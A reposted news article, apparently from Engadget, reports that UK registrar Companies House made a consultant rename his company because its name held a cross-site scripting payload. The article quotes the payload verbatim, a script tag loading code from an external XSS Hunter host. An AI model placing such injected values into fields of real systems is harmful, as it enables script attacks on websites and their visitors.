Customize Consent Preferences

We use cookies to help you navigate efficiently and perform certain functions. You will find detailed information about all cookies under each consent category below.

The cookies that are categorized as "Necessary" are stored on your browser as they are essential for enabling the basic functionalities of the site. ... 

Always Active

Necessary cookies are required to enable the basic features of this site, such as providing secure log-in or adjusting your consent preferences. These cookies do not store any personally identifiable data.

No cookies to display.

Functional cookies help perform certain functionalities like sharing the content of the website on social media platforms, collecting feedback, and other third-party features.

No cookies to display.

Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics such as the number of visitors, bounce rate, traffic source, etc.

No cookies to display.

Performance cookies are used to understand and analyze the key performance indexes of the website which helps in delivering a better user experience for the visitors.

No cookies to display.

Advertisement cookies are used to provide visitors with customized advertisements based on the pages you visited previously and to analyze the effectiveness of the ad campaigns.

No cookies to display.

admin
Pinned November 19, 2020

<> Embed

@  Email

Report

Uploaded by user
Company made to change name that could be used for website hacks
<> Embed @  Email Report

Company made to change name that could be used for website hacks

Jon Fingas, @jonfingas

November 8, 2020

Companies have jokingly given themselves code-based names in the past (you can thank XKCD for that), but one of them was just forced to mend its ways. The Guardian reports that UK business registrar Companies House has forced a software consultant to change his company name after discovering that it could launch cross-site scripting attacks against vulnerable pages — yes, including Companies House. A site could have inadvertently compromised itself just by mentioning the company, which could be more than a little embarrassing for officials who greenlit the name.

The initial name, ““><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD,” risked confusing sites that didn’t handle the HTML formatting properly. They would think the company name was blank and run a script from the troubleshooting site XSS Hunter. It’s an innocuous script that would simply have put up a warning, but Companies House wasn’t willing to take any chances. The name might have “presented a security risk” to some sites, a spokesperson said.

The consultant has since changed his business name to “THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD.” Companies House, meanwhile, said it had “put measures in place” to prevent a repeat. You won’t be trying this yourself, at least not in the UK.

It’s more than a little amusing to see a for-the-laughs code name stir up trouble, but this also illustrates just how fragile web security can be. If a clever name can wreak havoc, there’s a lot of work to be done before site owners can say they’ve nailed security.

Engadget

(22)